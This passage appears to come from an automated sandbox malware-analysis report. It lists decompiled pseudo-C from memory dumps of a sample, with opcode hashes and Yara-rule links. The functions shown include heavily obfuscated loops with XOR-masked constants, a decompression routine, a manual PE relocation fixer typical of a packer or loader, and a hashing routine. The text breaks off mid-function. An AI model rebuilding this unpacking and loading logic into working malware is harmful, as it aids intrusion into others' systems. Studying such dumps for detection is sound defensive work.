				_t89 = (_t87 ^ 0x2a823c2b) + 0x138527e2;
				 *0x2449849 =  *0x2449849 + 0x2c9c;
				_push(__ebx);
				_v20 = _t89;
				_v12 = 0xc6f8e04b;
				 *0x24497c9 =  *0x24497c9 + _t89;
				_push(__edi);
				do {
					asm("adc dword [0x2449811], 0x2449809");
					 *0x2449809 =  *0x2449809 + 0x4869;
					_t92 = (_v16 ^ _t80) + 0x138527e2;
					while(1) {
						 *0x244978d = 0x7e49;
						 *0x244973d = 0x2565;
						_v32 = _t92;
						 *0x2449781 = 0x284c;
						if(_v12 == 0xc6f8e664) {
						}
						L3:
						 *0x2449745 = 0x1188;
						if(_t92 < 0x40) {
							 *((char*)(_t159 + _t92 - 0x60)) = _v5;
							 *0x244984d = 0x40cb;
							 *0x2449859 = 0x5a0d;
							if(_t92 == 0x3f) {
								 *0x244985d = 0x17e6;
								L7:
								 *0x2449845 =  *0x2449845 + 0x4af7;
								 *0x24497d1 =  *0x24497d1 ^ 0x02449841;
								_t132 = (_v16 ^ _t80) + 0x138527e2;
								 *0x24497f9 = 0x193c;
								 *0x2449785 = 0xe26;
								if(_t132 != _v28) {
									do {
										_t116 =  *0x2449795; // 0xff4dd7d5
										 *0x244974d =  *0x244974d & _t116;
										 *0x2449779 =  *0x2449779 + 0x78a1;
										 *0x24497c1 =  *0x24497c1 & 0x00001cae;
										 *0x24497f9 =  *0x24497f9 + 0x2449739;
										_v36 = (0x000020b6 ^  *(_a4 + 2 + _t132 * 4)) + 0x00003f01 & 0x0000ffff;
										asm("sbb dword [0x244978d], 0x244980d");
										 *0x2449795 =  *0x2449795 | 0x02449741;
										 *0x2449739 =  *0x2449739 + 0x79e4;
										 *0x2449805 = 0x571e;
										 *((char*)(_t159 + _v36 - 0x60)) = ( *(_a4 + _t132 * 4) & 0x0000ffff ^ 0x000020b6) + 0x3f01;
										 *0x2449849 = 0x6ac4;
										 *0x2449859 = 0x1709;
										_t132 = _t132 + 1;
										 *0x2449751 = 0x33c4;
									} while (_t132 != _v28);
									 *0x244973d =  *0x244973d + ( *0x24497cd & 0x0000ffff);
									_t92 = _v32;
								}
								asm("adc dword [0x24497fd], 0x3f84");
								 *0x2449849 =  *0x2449849 ^ 0x000016be;
								 *0x244978d = 0x6357;
								 *_a12 = (_v16 ^ _t80) + 0x138527e2;
							}
							 *0x2449791 = 0x630a;
							_t92 = _t92 + 1;
							 *0x244978d = 0x7e49;
							 *0x244973d = 0x2565;
							_v32 = _t92;
							 *0x2449781 = 0x284c;
							if(_v12 == 0xc6f8e664) {
							}
						}
						L6:
						 *0x24497f9 =  *0x24497f9 + 0x24497c9;
						asm("sbb dword [0x2449791], 0x70ba");
						 *0x24497b9 =  *0x24497b9 & 0x0244983d;
						_t148 = (_v12 ^ _t80) - (_v24 ^ _t80) - 0x138527e2 ^ _t80;
						 *0x244974d = 0x4bed;
						_v12 = _t148;
						if(_t148 == 0xc6f8e38a) {
							goto L7;
						}
						break;
					}
				} while (_v12 != 0xc6f8e478);
				_a4 = 0xc6f8d435;
				while((_a4 ^ _t80) + 0x138527e2 != 0) {
					if( *((intOrPtr*)(_t159 + _v20 - 0x60)) == _v5) {
						L18:
						_v20 = (_v24 ^ _t80) + _v20 + 0x138527e2;
						_a8 = _a8 + 1;
						continue;
					} else {
						_a4 = (_a4 ^ _t80) - (_v24 ^ _t80) - 0x138527e2 ^ _t80;
						if( *((intOrPtr*)(_t159 + _v20 - 0x60)) == _v5) {
							goto L18;
						} else {
							if( *((intOrPtr*)(_t159 + _v20 - 0x60)) ==  *_a8) {
								if( *_a8 == (_v16 ^ _t80) + 0x138527e2) {
									break;
								} else {
									goto L18;
								}
							}
						}
					}
					L21:
					return _t80;
				}
				_t114 = _v24 ^ _t80;
				_t80 = _a12;
				 *_t80 = _t114 + 0x138527e2;
				goto L21;
			}

0x0244100d
0x0244101e
0x0244102d
0x02441038
0x02441048
0x0244104b
0x02441052
0x0244105c
0x0244105f
0x0244106f
0x0244107b
0x02441087
0x02441089
0x02441092
0x02441099
0x0244109d
0x024410a7
0x024410ac
0x024410b4
0x024410bf
0x024410c9
0x024410cb
0x024410d5
0x024410d6
0x024410d9
0x024410e0
0x024410e6
0x024410e7
0x024410ea
0x024410f6
0x02441100
0x02441102
0x02441102
0x02441113
0x0244111d
0x02441120
0x0244112a
0x0244112a
0x02441130
0x02441130
0x0244113d
0x02441146
0x0244114a
0x02441157
0x02441161
0x02441167
0x024411be
0x024411be
0x024411ce
0x024411da
0x024411dc
0x024411e8
0x024411f2
0x024411f8
0x024411fb
0x02441201
0x0244120c
0x02441226
0x02441233
0x02441240
0x02441246
0x02441254
0x02441264
0x02441273
0x0244127d
0x02441281
0x0244128e
0x02441298
0x0244129b
0x0244129b
0x024412b2
0x024412b8
0x024412b8
0x024412c1
0x024412cd
0x024412d9
0x024412e3
0x024412e3
0x024412e5
0x024412ef
0x02441102
0x02441113
0x0244111d
0x02441120
0x0244112a
0x0244112a
0x0244112a
0x02441176
0x02441181
0x0244118d
0x02441199
0x024411a3
0x024411a5
0x024411af
0x024411b8
0x00000000
0x00000000
0x00000000
0x024411b8
0x024412f5
0x02441303
0x02441383
0x0244131c
0x0244136e
0x0244137d
0x02441380
0x00000000
0x02441322
0x02441332
0x02441341
0x00000000
0x02441347
0x02441353
0x02441368
0x00000000
0x00000000
0x00000000
0x00000000
0x02441368
0x02441353
0x02441341
0x0244139c
0x0244139e
0x0244139e
0x02441393
0x02441395
0x0244139a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c99eb28e91308eb842a03ce732a7b6933293411bca372faf6c429f5226026c
Instruction ID: a6639a365cfea59c5285d7816df59a8291d2b46e3491e0926dc6b7352444ef56
Opcode Fuzzy Hash: f6c99eb28e91308eb842a03ce732a7b6933293411bca372faf6c429f5226026c
Instruction Fuzzy Hash: BC91CE78E84755CFEB08CF68E4949AF7BF2FB58318B10885EC44A97381DB781566EB40

Uniqueness

Uniqueness Score: -1.00%

Function 02459F88, Relevance: .2, Instructions: 192
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E02459F88(intOrPtr __eax, signed int _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _t98;
				signed short _t149;
				signed short _t182;

				_v16 = 0xc6f8e435;
				_v28 = 0xc6f8e434;
				_v32 = 0xc6f8e40b;
				_v12 = 0xc6f8e454;
				_v36 = 0xc6f8e474;
				_v48 = 0xc6f8e4b3;
				_v48 = 0xc6f8e453;
				_v20 = __eax;
				_v24 = _a4;
				if(_v20 == (_v16 ^ 0x2a823c2b) + 0x138527e2 || _v24 == (_v16 ^ 0x2a823c2b) + 0x138527e2) {
					L20:
					_t98 = _v28;
				} else {
					_v40 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
					_v44 = (_v16 ^ 0x2a823c2b) + 0x138527e2;
					_v12 = (_v12 ^ 0x00003c2b) + 0x27e2 - (_v36 ^ 0x00003c2b) + 0x27e2;
					while(1) {
						_a4 =  *((intOrPtr*)(_v20 + _v40 * 2));
						_v8 =  *((intOrPtr*)(_v24 + _v44 * 2));
						if(_a4 == (_v16 ^ 0x00003c2b) + 0x27e2) {
							break;
						}
						if(_v8 == (_v16 ^ 0x00003c2b) + 0x27e2) {
							_v28 = (_v16 ^ 0x2a823c2b) + _v28 + 0x138527e2;
							L18:
							_v52 = _v40 - 0x138527e2 ^ 0x2a823c2b;
							_v56 = _v44 - 0x138527e2 ^ 0x2a823c2b;
							if((( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v52 ^ 0x2a823c2b) + 0x138527e2) + _v20) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b) != (( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v56 ^ 0x2a823c2b) + 0x138527e2) + _v24) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b)) {
								goto L20;
							} else {
								_t98 = _v16;
								if((( *(((_v32 ^ 0x2a823c2b) + 0x138527e2) * ((_v52 ^ 0x2a823c2b) + 0x138527e2) + _v20) & 0x0000ffff) - 0x138527e2 ^ 0x2a823c2b) != _v16) {
									goto L20;
								}
							}
						} else {
							_t182 = _v8;
							_t149 = _a4;
							if(_a8 == (_v16 ^ 0x2a823c2b) + 0x138527e2) {
								L13:
								if(_t149 != _t182) {
									goto L20;
								} else {
									goto L14;
								}
							} else {
								if(_t149 == _t182) {
									L14:
									_v20 = (_v32 ^ 0x2a823c2b) + _v20 + 0x138527e2;
									_v24 = (_v32 ^ 0x2a823c2b) + _v24 + 0x138527e2;
									continue;
								} else {
									if(_a4 >= (_v36 ^ 0x00003c2b) + 0x27e2 && _a4 <= (_v48 ^ 0x00003c2b) + 0x27e2) {
										_a4 = (_a4 & 0x0000ffff) + (_v12 & 0x0000ffff);
									}
									if(_v8 >= (_v36 ^ 0x00003c2b) + 0x27e2 && _v8 <= (_v48 ^ 0x00003c2b) + 0x27e2) {
										_v8 = (_v8 & 0x0000ffff) + (_v12 & 0x0000ffff);
									}
									_t182 = _v8;
									_t149 = _a4;
									goto L13;
								}
							}
						}
						goto L21;
					}
					_v16 = ((_v28 ^ 0x2a823c2b) + 0x138527e2) * _v16;
					goto L18;
				}
				L21:
				return (_t98 ^ 0x2a823c2b) + 0x138527e2;
			}

0x02459f8e
0x02459f95
0x02459f9c
0x02459fa3
0x02459faa
0x02459fb1
0x02459fb8
0x02459fbf
0x02459fc5
0x02459fe1
0x0245a1c0
0x0245a1c0
0x02459ff9
0x0245a000
0x0245a00a
0x0245a027
0x0245a0f0
0x0245a0fa
0x0245a108
0x0245a11a
0x00000000
0x00000000
0x0245a03e
0x0245a141
0x0245a144
0x0245a14b
0x0245a155
0x0245a195
0x00000000
0x0245a197
0x0245a1bb
0x0245a1be
0x00000000
0x00000000
0x0245a1be
0x0245a044
0x0245a050
0x0245a054
0x0245a058
0x0245a0c3
0x0245a0c6
0x00000000
0x00000000
0x00000000
0x00000000
0x0245a05a
0x0245a05d
0x0245a0cc
0x0245a0db
0x0245a0ed
0x00000000
0x0245a05f
0x0245a06d
0x0245a089
0x0245a089
0x0245a09b
0x0245a0b7
0x0245a0b7
0x0245a0bb
0x0245a0bf
0x00000000
0x0245a0bf
0x0245a05d
0x0245a058
0x00000000
0x0245a03e
0x0245a12d
0x00000000
0x0245a12d
0x0245a1c3
0x0245a1cb

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a8d0f4976fb5cdb84c7712954a7227c02341357d3eff4a4510478783533168c
Instruction ID: 6af0b33f97d6636b3c8f92de452d3e4087cb34ee6daa06a5257628549b7c77d6
Opcode Fuzzy Hash: 6a8d0f4976fb5cdb84c7712954a7227c02341357d3eff4a4510478783533168c
Instruction Fuzzy Hash: DC711C36E101299FDB14DFA9C9405EEF7B2FF8C750B5A8566D854BB300D734AA42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00413E5D, Relevance: .2, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00413E5D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				unsigned int _t67;
				signed int _t68;
				intOrPtr _t71;
				void* _t79;
				signed int _t81;
				intOrPtr _t87;
				intOrPtr _t88;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t101;
				signed int _t102;
				unsigned int _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				intOrPtr* _t119;
				unsigned int _t125;
				signed int _t126;
				signed int _t128;

				_t71 = _a4;
				_t98 = 0;
				_t99 = 0;
				_v16 = 0;
				_v20 = 1;
				L1:
				while(1) {
					if(_t99 == 0) {
						_t103 =  *(_t98 + _t71);
						_t98 = _t98 + 4;
						_t99 = 0x1f;
						_t104 = _t103 >> 0x1f;
					} else {
						_t99 = _t99 - 1;
						_t104 = _t67 >> _t99 & 0x00000001;
					}
					if(_t104 != 0) {
						_v16 = _v16 + 1;
						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
						_t98 = _t98 + 1;
						L6:
						_t71 = _a4;
						continue;
					}
					_v12 = 1;
					do {
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t100 = 0x1f;
							_t106 = _t67 >> 0x1f;
						} else {
							_t100 = _t99 - 1;
							_t106 = _t67 >> _t100 & 0x00000001;
						}
						_v12 = _t106 + _v12 * 2;
						if(_t100 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t108 = _t67 >> 0x1f;
						} else {
							_t99 = _t100 - 1;
							_t108 = _t67 >> _t99 & 0x00000001;
						}
					} while (_t108 == 0);
					_t111 = _v12;
					if(_t111 == 2) {
						_t81 = _v20;
						L19:
						_v12 = _t81;
						if(_t99 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t101 = 0x1f;
							_v8 = _t67 >> 0x1f;
						} else {
							_t101 = _t99 - 1;
							_v8 = _t67 >> _t101 & 0x00000001;
						}
						if(_t101 == 0) {
							_t67 =  *(_t98 + _t71);
							_t98 = _t98 + 4;
							_t99 = 0x1f;
							_t115 = _t67 >> 0x1f;
						} else {
							_t99 = _t101 - 1;
							_t115 = _t67 >> _t99 & 0x00000001;
						}
						_t116 = _t115 + _v8 * 2;
						_v8 = _t116;
						if(_t116 == 0) {
							_v8 = 1;
							do {
								if(_t99 == 0) {
									_t125 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t102 = 0x1f;
									_t126 = _t125 >> 0x1f;
								} else {
									_t102 = _t99 - 1;
									_t126 = _t67 >> _t102 & 0x00000001;
								}
								_v8 = _t126 + _v8 * 2;
								if(_t102 == 0) {
									_t67 =  *(_t98 + _t71);
									_t98 = _t98 + 4;
									_t99 = 0x1f;
									_t128 = _t67 >> 0x1f;
								} else {
									_t99 = _t102 - 1;
									_t128 = _t67 >> _t99 & 0x00000001;
								}
							} while (_t128 == 0);
							_v8 = _v8 + 2;
						}
						asm("sbb ecx, ecx");
						_v8 = _v8 +  ~0xd00;
						_t87 = _v16;
						_t119 = _t87 - _v12 + _a12;
						_v16 = _t119;
						 *((char*)(_t87 + _a12)) =  *_t119;
						_t88 = _t87 + 1;
						_v16 = _v16 + 1;
						do {
							 *((char*)(_t88 + _a12)) =  *_v16;
							_t88 = _t88 + 1;
							_v16 = _v16 + 1;
							_t57 =  &_v8;
							 *_t57 = _v8 - 1;
						} while ( *_t57 != 0);
						_v16 = _t88;
						goto L6;
					}
					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
					_t98 = _t98 + 1;
					if(_t79 != 0xffffffff) {
						_t81 = _t79 + 1;
						_v20 = _t81;
						goto L19;
					}
					_t68 = _a16;
					 *_t68 = _v16;
					return _t68 & 0xffffff00 | _t98 == _a8;
				}
			}

0x00413e64
0x00413e68
0x00413e6d
0x00413e6f
0x00413e72
0x00000000
0x00413e79
0x00413e7b
0x00413e8e
0x00413e90
0x00413e93
0x00413e94
0x00413e7d
0x00413e7d
0x00413e84
0x00413e84
0x00413e99
0x00413ea4
0x00413ea7
0x00413eaa
0x00413eab
0x00413eab
0x00000000
0x00413eab
0x00413eb0
0x00413eb7
0x00413eb9
0x00413ec7
0x00413ece
0x00413ed1
0x00413ed2
0x00413ebb
0x00413ebb
0x00413ec2
0x00413ec2
0x00413edb
0x00413ee0
0x00413eee
0x00413ef5
0x00413ef8
0x00413ef9
0x00413ee2
0x00413ee2
0x00413ee9
0x00413ee9
0x00413efc
0x00413f00
0x00413f06
0x00413f08
0x00413f27
0x00413f27
0x00413f2c
0x00413f3d
0x00413f42
0x00413f4a
0x00413f4b
0x00413f2e
0x00413f2e
0x00413f38
0x00413f38
0x00413f50
0x00413f5e
0x00413f65
0x00413f68
0x00413f69
0x00413f52
0x00413f52
0x00413f59
0x00413f59
0x00413f6f
0x00413f72
0x00413f77
0x00413f79
0x00413f80
0x00413f82
0x00413f95
0x00413f97
0x00413f9a
0x00413f9b
0x00413f84
0x00413f84
0x00413f8b
0x00413f8b
0x00413fa4
0x00413fa9
0x00413fb7
0x00413fbe
0x00413fc1
0x00413fc2
0x00413fab
0x00413fab
0x00413fb2
0x00413fb2
0x00413fc5
0x00413fc9
0x00413fc9
0x00413fd5
0x00413fd9
0x00413fdc
0x00413fe4
0x00413fe9
0x00413fef
0x00413ff2
0x00413ff3
0x00413ff6
0x00413ffe
0x00414001
0x00414002
0x00414005
0x00414005
0x00414005
0x0041400a
0x00000000
0x0041400a
0x00413f17
0x00413f19
0x00413f1d
0x00413f23
0x00413f24
0x00000000
0x00413f24
0x00414012
0x0041401d
0x00414024
0x00414024

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce31d1979fd9319f339b4cc567b59426a31eda7a677de6bf59c0d1099e92a161
Instruction ID: 1e5b42afd7867fdbe3c4646a7ed1ab2e66daf4721927dd91ad809288241edded
Opcode Fuzzy Hash: ce31d1979fd9319f339b4cc567b59426a31eda7a677de6bf59c0d1099e92a161
Instruction Fuzzy Hash: CD51E532E006259BDB14CE5CC4506EDF7B1EF85724F1A42AADD06BF785C634AE82DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0245A9BA, Relevance: .1, Instructions: 123
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0245A9BA(signed int _a4, intOrPtr _a8, signed int _a11, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _t63;
				signed char _t90;
				signed int _t121;

				_v8 = 0xc6f8e435;
				_v28 = 0xffffffffc6f8e434;
				if(_a4 == (_v8 ^ 0x2a823c2b) + 0x138527e2 || _a8 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
					_t63 = _v8;
				} else {
					_v12 = _a12;
					_v24 = _a8;
					_a8 = 0xc6f8e52d;
					_a8 = 0xc6f8e409;
					_v20 = 0xc6f8e435;
					_a4 = 0xffffffffc6f8e434;
					_v8 = 0xc6f8e40b;
					_v16 = _a4;
					_a12 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _v24;
					_a8 = 0xc6f8e408;
					while(_v8 != 0xc6f8e435) {
						if(_a12 % ((_a4 ^ 0x2a823c2b) + (_a4 ^ 0x2a823c2b) + 0x270a4fc4) == (_v8 ^ 0x2a823c2b) - (_a4 ^ 0x2a823c2b)) {
							_t90 =  *(_a12 + _v16);
							_a11 = 0xee;
							if(_v12 == 0) {
								_a11 = (_a11 & 0x000000ff) + _v12;
								_a11 = ((_v20 ^ 0x2a823c2b) + 0x138527e2) * (_a11 & 0x000000ff);
								_a11 = (_t90 ^ 0x0000003f) + 0x2f + (_a11 & 0x000000ff);
								_t90 = _a11;
							}
							 *(_a12 + _v16) = _t90;
						}
						if((_a12 - 0x138527e2 ^ 0x2a823c2b) != _v20) {
							_t121 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _a12;
						} else {
							_v8 = (_v8 ^ 0x2a823c2b) - (_a4 ^ 0x2a823c2b) - 0x138527e2 ^ 0x2a823c2b;
							_t121 = 0xec7ad81e - (_a4 ^ 0x2a823c2b) + _v24;
						}
						_a12 = _t121;
					}
					_t63 = _v28;
				}
				return (_t63 ^ 0x2a823c2b) + 0x138527e2;
			}

0x0245a9c8
0x0245a9ce
0x0245a9e7
0x0245ab0e
0x0245a9ff
0x0245aa02
0x0245aa08
0x0245aa0e
0x0245aa15
0x0245aa1c
0x0245aa1f
0x0245aa22
0x0245aa2c
0x0245aa3b
0x0245aa3e
0x0245aafe
0x0245aa70
0x0245aa78
0x0245aa7a
0x0245aa83
0x0245aa8e
0x0245aaa3
0x0245aaac
0x0245aaaf
0x0245aaaf
0x0245aab8
0x0245aab8
0x0245aac6
0x0245aaf8
0x0245aac8
0x0245aad8
0x0245aae7
0x0245aae7
0x0245aafb
0x0245aafb
0x0245ab09
0x0245ab09
0x0245ab19

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aba3e3b56a01312f57201b85737df0a1001f238ffcaa14535ec6ab7cab14d342
Instruction ID: 1af6e8e646805bc8a070f90fcf593ba4a7abd67cd1fe11c4d9e5efade39afe1f
Opcode Fuzzy Hash: aba3e3b56a01312f57201b85737df0a1001f238ffcaa14535ec6ab7cab14d342
Instruction Fuzzy Hash: 81410C75B05259DFCB05CFA9C9C05DEBBF2EF99210B14C269E858DB309D230DA56CB90

Uniqueness

Uniqueness Score: -1.00%

Function 024598C3, Relevance: .1, Instructions: 121
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E024598C3(intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _t71;
				intOrPtr* _t78;
				intOrPtr _t80;
				signed short* _t83;
				unsigned int _t94;
				intOrPtr _t112;
				signed int _t121;

				_v8 = 0xc6f8e435;
				_v44 = 0xc6f8e434;
				if(_a4 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
					_t71 = _v8;
				} else {
					_a8 = _a4 +  *((intOrPtr*)(_a4 + 0x3c));
					_v32 = 0xc6f8e408;
					if( *((intOrPtr*)(_a8 + (_v32 ^ 0x2a823c2b) * 8 - 0x63d6c078)) != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
						_t78 = _a4 +  *((intOrPtr*)(_a8 + 0xa0));
						_t112 = _a4 -  *((intOrPtr*)(_a8 + 0x34));
						_v40 = _t112;
						if(_t112 != (_v8 ^ 0x2a823c2b) + 0x138527e2) {
							_v12 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
							_v20 = 0xc6f8e40a;
							while(1) {
								_t80 =  *((intOrPtr*)(_t78 + 4));
								_v16 = _t80;
								if(_t80 == (_v8 ^ 0x2a823c2b) + 0x138527e2) {
									break;
								}
								_t121 = (_v8 ^ 0x2a823c2b) + 0x138527e2;
								_t94 = _t80 - 8 >> 1;
								if(_t121 < _t94) {
									_t83 = _t78 + 8 + _t121 * 2;
									_v28 = _t94 - _t121;
									do {
										_v24 =  *_t83 & 0xfff;
										_v36 = _v24 +  *_t78 - 0x138527e2 ^ 0x2a823c2b;
										_v24 = ( *_t83 & 0x0000ffff) >> 0xc;
										_v36 = (_v36 ^ 0x2a823c2b) + _a4 + 0x138527e2;
										if(_v24 == (_v20 ^ 0x2a823c2b) + 0x138527e2 && _v24 == (_v20 ^ 0x2a823c2b) + 0x138527e2) {
											 *_v36 =  *_v36 + _v40;
										}
										_t83 =  &(_t83[1]);
										_t50 =  &_v28;
										 *_t50 = _v28 - 1;
									} while ( *_t50 != 0);
									_t80 = _v16;
								}
								_v12 = _v12 + _t80;
								if(_v12 <  *((intOrPtr*)(_a8 + (_v32 ^ 0x2a823c2b) * 8 - 0x63d6c074))) {
									_t78 = _t78 + _v16;
									continue;
								}
								break;
							}
						}
					}
					_t71 = _v44;
				}
				return (_t71 ^ 0x2a823c2b) + 0x138527e2;
			}

0x024598c9
0x024598d0
0x024598f6
0x02459a1d
0x024598fc
0x02459906
0x02459909
0x02459926
0x02459932
0x0245993e
0x02459948
0x0245994d
0x0245995a
0x0245995e
0x02459a01
0x02459a04
0x02459a0b
0x02459a10
0x00000000
0x00000000
0x02459972
0x02459974
0x02459978
0x0245997c
0x02459980
0x02459983
0x0245998c
0x024599a0
0x024599a3
0x024599b5
0x024599c4
0x024599da
0x024599da
0x024599dc
0x024599df
0x024599df
0x024599df
0x024599e4
0x024599e4
0x024599e7
0x024599fc
0x024599fe
0x00000000
0x024599fe
0x00000000
0x024599fc
0x02459a16
0x0245994d
0x02459a17
0x02459a1a
0x02459a26

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d106af72c2a24437af1b78b0ec52059825d0150cf866c811c678b18ab7908966
Instruction ID: 06899629b0caef863126405333d3405a6845bf80ab6987f68012cc54736659ed
Opcode Fuzzy Hash: d106af72c2a24437af1b78b0ec52059825d0150cf866c811c678b18ab7908966
Instruction Fuzzy Hash: 19519376D00229DBCF14CF99C9815EEB7B1FF88320B5A8156EC587B301D674AE428BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0245AB1C, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0245AB1C(signed int _a4, signed int _a7) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				signed int _t64;
				intOrPtr* _t83;
				void* _t125;

				_v24 = 0xc6f8e435;
				_v16 = 0xc6f8e434;
				_v28 = 0xc6f8e535;
				_v32 = 0xc6f8e436;
				_v12 = (_v24 ^ 0x2a823c2b) + 0x138527e2;
				_v36 = 0xc6f8e40d;
				_v8 = 0xf0b16715;
				_v20 = 8;
				_t64 = ((_v16 ^ 0x2a823c2b) + 0x138527e2) * ((_v24 ^ 0x2a823c2b) + 0x138527e2);
				while(1) {
					_v8 = _t64;
					if(_v8 > (_v28 ^ 0x2a823c2b) - (_v16 ^ 0x2a823c2b)) {
						break;
					}
					_v12 = _v8 - 0x138527e2 ^ 0x2a823c2b;
					_v12 = E0245A912( &_v12);
					 *((intOrPtr*)(_t125 + _v8 * 4 - 0x420)) = _v12;
					_t64 = (_v16 ^ 0x2a823c2b) + _v8 + 0x138527e2;
				}
				_v12 = (_v32 ^ 0x2a823c2b) + 0x138527e2;
				_v28 = 0xc6f8e536;
				while(_v20 != (_v24 ^ 0x2a823c2b) + 0x138527e2) {
					_v8 = _v12 >> (_v36 ^ 0x2a823c2b) + 0x138527e2;
					_t83 = _a4;
					_a7 =  *_t83;
					_a4 = _a7 & 0x000000ff ^ _v12;
					_v12 =  *(_t125 + ((_v28 ^ 0x2a823c2b) + 0x138527e2 & _a4) * 4 - 0x420) ^ _v8;
					_a4 = _t83 + (_v16 ^ 0x2a823c2b) + 0x138527e2;
					_v20 = 0xec7ad81e - (_v16 ^ 0x2a823c2b) + _v20;
				}
				return (_v32 ^ 0x2a823c2b) + 0x138527e2 ^ _v12;
			}

0x0245ab25
0x0245ab2c
0x0245ab33
0x0245ab3b
0x0245ab55
0x0245ab58
0x0245ab5f
0x0245ab66
0x0245ab7d
0x0245abb3
0x0245abb3
0x0245abc7
0x00000000
0x00000000
0x0245ab89
0x0245ab94
0x0245ab9d
0x0245abac
0x0245abac
0x0245abd0
0x0245abd3
0x0245ac3f
0x0245abea
0x0245abed
0x0245abf2
0x0245ac00
0x0245ac1b
0x0245ac2a
0x0245ac3c
0x0245ac3c
0x0245ac5d

Memory Dump Source

Source File: 00000001.00000002.200005874.0000000002449000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true

Associated: 00000001.00000002.199998558.0000000002440000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4158e6c464061f9a60b1b86502862b9dc3ed9c6b2a71d0b636297bdd212dd3cf
Instruction ID: 2013520f83057c811e6b790b8f0abe09783ba75dcacebf4c4d5ea10120185e55
Opcode Fuzzy Hash: 4158e6c464061f9a60b1b86502862b9dc3ed9c6b2a71d0b636297bdd212dd3cf
Instruction Fuzzy Hash: 3241D675B101199FCF08CFA8D8A09EEBBF1BF9C214F54409ED846EB341E6309A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004122B7, Relevance: .1, Instructions: 70
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004122B7() {
				signed int _t23;
				signed int _t59;
				signed int* _t63;
				signed int _t64;

				_t23 =  *0x41fe6c;
				if(_t23 >= 0x270) {
					_t64 = 0;
					do {
						_t59 = _t64;
						_t64 = _t64 + 1;
						0x41f4a0[_t59] = (( *(0x41f4a4 + _t59 * 4) ^ 0x41f4a0[_t59]) & 0x7fffffff ^ 0x41f4a0[_t59]) >> 0x00000001 ^  *(0x41e380 + ((( *(0x41f4a4 + _t59 * 4) ^ 0x41f4a0[_t59]) & 0x7fffffff ^ 0x41f4a0[_t59]) & 0x00000001) * 4) ^  *(0x41fad4 + _t59 * 4);
					} while (_t64 < 0xe3);
					if(_t64 < 0x26f) {
						_t63 =  &(0x41f4a0[_t64]);
						do {
